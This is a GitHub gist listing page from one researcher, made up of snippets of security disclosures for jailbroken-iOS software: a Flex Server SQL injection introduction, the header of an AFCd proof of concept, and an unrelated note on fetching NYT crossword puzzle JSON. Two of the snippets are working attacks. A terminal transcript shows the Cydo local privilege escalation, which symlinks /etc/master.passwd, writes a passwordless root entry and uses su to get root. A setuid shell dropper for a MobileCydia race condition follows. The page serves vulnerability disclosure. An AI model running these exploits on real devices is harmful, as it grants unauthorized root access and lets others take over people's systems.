Skip to content

Instantly share code, notes, and snippets.

View PythEch's full-sized avatar

PythEch

  • Amsterdam
View GitHub Profile
@PythEch
PythEch / flex_disclosure.md
Last active June 22, 2016 18:37
Flex Server Multiple Vulnerabilities

Introduction

This gist includes multiple SQL injection vulnerabilities I found by accident in a bus while travelling. These vulnerabilities are easy to find and easy to exploit, and critical.

Background

I already have Flex legacy paid but, can't buy Flex 2 because of credit card restrictions. Anyway, I decided to give Flex 2 a shot, downloaded the beta from getdelta.co

For fun, I tried to figure out whether spoofing UDID is possible by patching Flex 2 itself. I already knew you have put so much work into DRM. I'm still unsuccessful at this.

#! /usr/bin/env python
"""
PoC of AFCd Vulnerability After Pangu Jailbreak
Copyright (C) 2014 PythEch
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
@PythEch
PythEch / gist:d181bf1411057e480586
Last active June 22, 2016 18:38
Cydo Arbitrary Write Local Privilege Escalation
Hakans-iPhone:/var/tmp mobile$ ln -s /etc/master.passwd
Hakans-iPhone:/var/tmp mobile$ mv master.passwd cydia.log
Hakans-iPhone:/var/tmp mobile$ /usr/libexec/cydia/cydo ":0:0::0:0:System Administrator:/var/root:/bin/sh"
thou shalt not pass
Hakans-iPhone:/var/tmp mobile$ su cydo
Hakans-iPhone:/var/tmp root# cat /etc/master.passwd
##
# User Database
#
# This file is the authoritative user database.
@PythEch
PythEch / poc.md
Last active July 11, 2022 00:46
MobileCydia.mm Race Condition LPE

Generic shell dropper:

#include <sys/types.h>
#include <unistd.h>

int main(int argc, char **argv, char **envp) {
    setuid(0); 
    execl("/bin/sh", "/bin/sh", 0);
    return 0;
}
1. Get https://nyt-games-prd.appspot.com/svc/crosswords/v3/games-hub-puzzles.json
2. Extract results.mini_puzzle.[*].puzzle_id
3. Then head over to https://nyt-games-prd.appspot.com/svc/crosswords/v6/${puzzle_id}.json
4. Parse the data.